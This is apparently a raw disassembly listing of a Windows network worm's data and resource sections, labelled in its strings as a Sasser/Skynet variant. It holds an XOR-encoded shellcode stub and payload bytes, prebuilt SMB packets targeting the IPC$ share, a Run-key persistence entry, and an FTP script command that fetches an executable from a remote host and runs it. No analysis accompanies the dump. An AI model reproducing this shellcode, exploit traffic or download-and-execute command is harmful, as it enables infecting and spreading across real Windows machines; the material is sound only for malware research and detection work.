db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406DB4�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_403669+119�o
align 10h
asc_405400 db 0Ah ; DATA XREF: sub_403669+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_403669+D3�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_403669+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_403669+7D�o
align 4
dword_40543C dd 0 ; sub_40479E+36�o
dword_405440 dd 0FFFFFFFFh, 4038B5h, 4038B9haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404613+3D�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404613+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_404613+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_404613+D�o
align 4
dword_405488 dd 0FFFFFFFFh, 4048AEh, 4048B2h, 0FFFFFFFFh, 404962h, 404966h
; DATA XREF: sub_40479E+5�o
dd 560Ch, 2 dup(0)
dd 5674h, 50E0h, 5540h, 2 dup(0)
dd 576Ch, 5014h, 561Ch, 2 dup(0)
dd 577Ah, 50F0h, 552Ch, 2 dup(0)
db 0CCh
db 57h, 2 dup(0)
dd 5000h, 5614h, 2 dup(0)
dd 57F6h, 50E8h, 5658h, 2 dup(0)
dd 5836h, 512Ch, 5 dup(0)
dd 77DFC41Bh, 77DDEBE7h, 77DD6BF0h, 77E34D78h, 0
dd 7C801D77h, 7C80BE01h, 7C834E64h, 7C838AE7h, 7C8365A5h
dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C86136Dh, 7C910331h, 7C80929Ch, 7C80E93Fh, 7C8286EEh
dd 7C821363h, 7C80ADA0h, 7C9179FDh, 7C809A51h, 7C9105D4h
dd 7C8127A7h, 7C809915h, 7C812E76h, 7C80A490h, 7C838A0Ch
dd 7C809BF8h, 7C810D87h, 7C937A40h, 7C91043Dh, 7C809AE4h
dd 7C812BB6h, 7C810EF8h, 7C810E51h, 7C838DE8h, 7C80CCA8h
dd 7C812F39h, 7C80CC97h, 7C812F08h, 7C81CF5Bh, 7C80A0D4h
dd 7C814AE7h, 7C80B6A1h, 7C801EEEh, 7C812F1Dh, 7C8111DAh
dd 7C81CDDAh, 7C801E16h, 7C80DDF5h, 7C862E2Ah, 7C81DF77h
dd 0
dd 7E41A8ADh, 0
dd 42C367F6h, 0
dd 71AB664Dh, 71AB3E00h, 71AB88D3h, 71AC1028h, 71AB615Ah
dd 71AB428Ah, 71AB2B66h, 71AB3B91h, 71AB406Ah, 71AB9639h
dd 71AB50C8h, 71AB3F41h, 71AB2BF4h, 71AB4FD4h, 0
dd 76D64B79h, 76D64D5Eh, 76D64D33h, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 10h
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 4
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 10h
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 10h
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aInternetgetcon db 'InternetGetConnectedState',0
aWininet_dll db 'WININET.dll',0
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0
dd 63490000h, 6553706Dh, 6345646Eh, 6F68h, 63490000h, 7243706Dh
dd 65746165h, 656C6946h, 70690000h, 61706C68h, 642E6970h
dd 6C6Ch, 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 43746547h
dd 616D6D6Fh, 694C646Eh, 41656Eh, 65470000h, 72655674h
dd 6E6F6973h, 0
aExitprocess db 'ExitProcess',0
dd 65540000h, 6E696D72h, 50657461h, 65636F72h, 7373h, 65470000h
dd 72754374h, 746E6572h, 636F7250h, 737365h, 6E550000h
dd 646E6168h, 4564656Ch, 70656378h, 6E6F6974h, 746C6946h
dd 7265h, 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 41h, 65657246h, 69766E45h, 6D6E6F72h, 53746E65h
dd 6E697274h, 577367h, 69570000h, 68436564h, 6F547261h
dd 746C754Dh, 74794269h, 65h, 45746547h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 73h, 45746547h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 5773h, 65530000h, 6E614874h, 43656C64h
dd 746E756Fh, 0
aGetstdhandle db 'GetStdHandle',0
align 4
aGetfiletype db 'GetFileType',0
dd 65480000h, 65447061h, 6F727473h, 79h, 70616548h, 61657243h
dd 6574h, 69560000h, 61757472h, 6572466Ch, 65h, 70616548h
dd 65657246h, 0
aRtlunwind db 'RtlUnwind',0
align 4
aWritefile db 'WriteFile',0
align 4
aMultibytetowid db 'MultiByteToWideChar',0
dd 65470000h, 72745374h, 54676E69h, 41657079h, 0
aGetstringtypew db 'GetStringTypeW',0
align 10h
dd 65470000h, 49504374h, 6F666Eh, 65470000h, 50434174h
dd 0
aGetoemcp db 'GetOEMCP',0
align 4
aHeapalloc db 'HeapAlloc',0
align 10h
aVirtualalloc db 'VirtualAlloc',0
align 10h
aHeaprealloc db 'HeapReAlloc',0
dd 434C0000h, 5370614Dh, 6E697274h, 4167h, 434C0000h, 5370614Dh
dd 6E697274h, 5767h, 161h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset sub_403D0B
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_405A5C+586h
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd offset word_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset aSkynetave_exe ; DATA XREF: sub_402176:loc_4021CE�r
; sub_402176+B5�r
; "skynetave.exe"
dd offset aLogon ; "Logon"
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B46+1A�r
; sub_401B46+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B46+77�r
; sub_401B46+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B46+A8�r
; sub_401B46+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B46+2BC�r
; sub_401B46+2C9�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B46+184�r
; sub_401B46+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B46+1B9�r
; sub_401B46+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4FhaLogon db 'Logon',0 ; DATA XREF: .text:004068CC�o
align 10h
aSkynetave_exe db 'skynetave.exe',0 ; DATA XREF: .text:off_4068C8�o
align 10h
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
aCWin2_log db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A28 dd 6EB06EBh, 0 dword_406A30 dd 1CEC8166h dword_406A34 dd 0E4FF07h dword_406A38 dd 302E35h dword_406A3C dd 312E35h aQuit db 'QUIT',0 ; DATA XREF: sub_401B46+2DA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B46+1A2�o
align 10h
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B46+173�o
; sub_401F2E+15�o
word_406A5C dw 2Ch ; DATA XREF: sub_401B46+EE�r
align 10h
aPort db 'PORT',0 ; DATA XREF: sub_401B46+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B46+95�o
align 10h
aUser db 'USER',0 ; DATA XREF: sub_401B46+64�o
align 4
asc_406A78: ; DATA XREF: sub_401F2E+146�o
unicode 0, < >,0
aSkynetsasserve db 'SkynetSasserVersionWithPingFast',0 ; DATA XREF: sub_4020C8+50�o
aJobaka3 db 'Jobaka3',0 ; DATA XREF: sub_4020C8+F�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_402176+8C�o
align 4
asc_406AD4: ; DATA XREF: sub_402176+4B�o
unicode 0, <\>,0
align 10h
off_406AE0 dd offset sub_402B9F ; DATA XREF: sub_4029D4+1C�r
dword_406AE4 dd 2 ; sub_403669+46�r
align 10h
off_406AF0 dd offset word_406AFA ; DATA XREF: sub_4028B0+1E�r
; sub_402AEC+12�r ...
dd offset word_406AFA
db 2 dup(0)
word_406AFA dw 20h ; DATA XREF: sub_403916+18�r
; .text:off_406AF0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CFC dd 1 dd 2Eh, 1
dword_406D08 dd 0C0000005h ; sub_402DA4+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D80 dd 3 dword_406D84 dd 7 dword_406D88 dd 0Ah dword_406D8C dd 8Ch ; sub_402C63+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D9C dd 19930520h, 4 dup(0) ; sub_403536+2�o
dword_406DB0 dd 2 ; sub_403669+28�r
off_406DB4 dd offset aR6002FloatingP ; DATA XREF: sub_403669+FC�r
; sub_403669+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 405384h, 9, 405358h, 0Ah, 405334h, 10h, 405308h
dd 11h, 4052D8h, 12h, 4052B4h, 13h, 405288h, 18h, 405250h
dd 19h, 405228h, 1Ah, 4051F0h, 1Bh, 4051B8h, 1Ch, 405190h
dd 78h, 405180h, 79h, 405170h, 7Ah, 405160h, 0FCh, 40515Ch
dd 0FFh, 40514Ch
byte_406E40 db 1 ; DATA XREF: sub_403669+1B�o
; sub_403947+E1�r
db 2, 4, 8
align 8
dword_406E48 dd 3A4h dword_406E4C dd 82798260h, 21h, 0dword_406E58 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F38 dd 3F8h ; sub_403D94+5�r
align 10h
dword_406F40 dd 6B896B75h ; sub_401000+10�w ...
dword_406F44 dd 0 ; sub_401210+D�r
dword_406F48 dd 0 ; sub_401398+C�o ...
dword_406F4C dd 0 ; sub_402720+91�w
dword_406F50 dd 0 ; sub_402E3F:loc_402E51�r ...
align 8
dword_406F58 dd 0 dd 3 dup(0)
dword_406F68 dd 0A28h dword_406F6C dd 501h dword_406F70 dd 5 dword_406F74 dd 1 dword_406F78 dd 1 dword_406F7C dd 0B10ED0h dd 0
dword_406F84 dd 0B10D70h dd 3 dup(0)
off_406F94 dd offset aCM_unpackerPac ; DATA XREF: sub_402EF8+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_406F9C db 0 ; DATA XREF: sub_402BB0+2D�w
align 10h
dword_406FA0 dd 0 dword_406FA4 dd 0 ; sub_402BB0+8B�w
dword_406FA8 dd 0 ; sub_402C63+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402EF8:loc_402F0F�o
; .text:off_406F94�o
align 4
dd 2Dh dup(0)
dword_40707C dd 0Dh dup(0) ; .text:00406638�o ...
dword_4070B0 dd 1 ; sub_403145+23�w ...
dword_4070B4 dd 0 dword_4070B8 dd 1 ; sub_4037BC:loc_403826�w
dword_4070BC dd 1 ; sub_403AE0+4�w ...
dword_4070C0 dd 0 ; resolved to->USER32.MessageBoxA ; sub_404613+2E�w ...
dword_4070C4 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_404613:loc_404662�r
dword_4070C8 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_404613+60�r
dd 2 dup(0)
dword_4070D4 dd 0 dd 3 dup(0)
dword_4070E4 dd 0 ; sub_403AE0+3A�r ...
dd 0
dword_4070EC dd 1 ; sub_40479E+4C�w ...
dword_4070F0 dd 0 dword_4070F4 dd 0 dword_4070F8 dd 10h ; sub_404467+5�r ...
dword_4070FC dd 0 ; sub_403E33+259�r ...
dword_407100 dd 330650h ; sub_403E33+310�w ...
dword_407104 dd 0 ; sub_403E33+22C�r ...
dword_407108 dd 1 ; sub_403E08�r ...
dword_40710C dd 330650h ; sub_403E08+8�r ...
dword_407110 dd 4E4h ; sub_403947+65�w ...
align 10h
dword_407120 dd 3 dup(0) ; sub_403947+171�o ...
dword_40712C dd 0 ; sub_403947+15D�w ...
dd 4 dup(0)
byte_407140 db 0 ; DATA XREF: sub_403B86:loc_403C92�w
; sub_403B86:loc_403CAF�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_407240 db 0 ; DATA XREF: sub_403947+5C�o
; sub_403947+AF�o ...
byte_407241 db 0 ; DATA XREF: sub_402F91+3F�r
; sub_402F91+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_407344 dd 0 ; sub_403947+12B�w ...
dword_407348 dd 330000h ; sub_403422+29�r ...
dd 5 dup(0)
dword_407360 dd 0B10EF0h ; sub_403277+45�r ...
dword_407364 dd 3Fh dup(0) dword_407460 dd 20h ; sub_403277:loc_403301�r ...
dword_407464 dd 1 dword_407468 dd 1 dword_40746C dd 0 dword_407470 dd 0 ; sub_402BB0+57�r
dword_407474 dd 0 dword_407478 dd 142340h ; sub_402DE7+F�r ...
dd 6E1h dup(0)
_text ends
; Section 2. (virtual address 00009000)
; Virtual size : 00017010 ( 94224.)
; Section size in file : 00017010 ( 94224.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 409000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 4 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C809A51h, 7C809AE4h, 0
dd 9010h, 0
dd 0FFFFFFFFh, 904Ch, 9010h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 47000000h, 72507465h, 6441636Fh
dd 73657264h, 73h, 72695600h, 6C617574h, 6F6C6C41h, 63h
dd 72695600h, 6C617574h, 65657246h, 48A0000h, 0A21D9AE5h
dd 5DA6561Bh, 74F9E498h, 6832C04Fh, 582D02F9h, 3C2343A3h
dd 0B6C52446h, 549C21Ch, 10EDD4A1h, 1914CB8Dh, 5000083Fh
dd 8B600000h, 8B242474h, 247Ch, 245C8B28h, 1B8BFC2Ch, 0DB85C933h
dd 80B21074h, 0DF030000h, 0E803B1A4h, 66h, 0FB3BF673h
dd 7C73h, 33575553h, 0ED3343DBh, 7C8DC38Bh, 0EB8B001Dh
dd 0DF8B0800h, 0F11C49E8h, 3D5C8Dh, 800C703h, 3AE8EF8Bh
dd 5D5FE20Eh, 73C12B5Bh, 8B090000h, 34E8C5h, 1CEB0000h
dd 0AC08E0C1h, 0E840h, 28h, 13DE88Bh, 83000040h, 813DFFD9h
dd 7076000h, 2BF78B56h, 5EA4F3F0h, 4141h, 0D20295EBh, 168A0575h
dd 0C3D21246h, 0E841C933h, 0FFEE0000h, 0C913FFFFh, 0FFFFE7E8h
dd 0C3F272FFh, 107C2Bh, 7C892824h, 0C2611C24h, 0B4480010h
dd 40003085h, 56DE03h, 90100060h, 90140000h, 7DF80000h
dd 77F40000h, 7FFDEBF8h, 6800h, 0B8h, 803054A0h, 400001Dh
dd 9A330000h, 0F8904000h, 57D70000h, 0F3A0000h, 40010000h
dd 501C02h, 4D5D00h, 610A7A00h, 3100F61h, 6430058h, 1004h
dd 3D57h, 80000h, 880107h, 51530000h, 55565752h, 1DE84000h
dd 30ED815Dh, 8D100011h, 25B5h, 8B100011h, 0C083FC46h
dd 8BF02B04h, 468B0856h, 31C0041h, 89088BC2h, 17128F8Dh
dd 0C418520h, 14240C93h, 0C970C06h, 0C100028h, 8BDE0C9Bh
dd 0F6854473h, 0E74h, 2BB9h, 8BF20300h, 0FA03407Bh, 0F38BA4F3h
dd 8D8D0000h, 1000129Fh, 226E851h, 4E8B0000h, 808B2Ch
dd 56032456h, 68406A08h, 6A5197h, 12FF0000h, 128B8589h
dd 0E8561000h, 3D7h, 2041E856h, 0CB0504DFh, 20620502h
dd 85343280h, 89840FC9h, 4E54h, 0E8565108h, 53Eh, 7B74C085h
dd 176F958Bh, 10000000h, 17738D8Bh, 0C9851000h, 8D8D0875h
dd 1367h, 2DEB1000h, 0C1F7h, 1E748000h, 0FFE18152h, 0FFFF0000h
dd 858D517Fh, 10001323h, 3C858D50h, 4000018h, 95FF5010h
dd 8B1D257Dh, 0C8030846h, 414100F8h, 858D5152h, 2B012D1h
dd 8D106A1Eh, 6A15BB85h, 0FF000800h, 1177995h, 13C395FFh
dd 401000h, 800068h, 0FF006A00h, 468BB8B5h, 8B280000h
dd 0C703087Eh, 468B10FFh, 5DC7030Ch, 97C5F5Eh, 0C35B595Ah
dd 205Eh, 100013A2h, 100013BBh, 1088142h, 6D100013h, 56100013h
dd 451B0000h, 7972746Eh, 696F5020h, 4E20746Eh, 746Fh, 756F4620h
dd 5400646Eh, 70206568h, 65636F72h, 7564030Ch, 65206572h
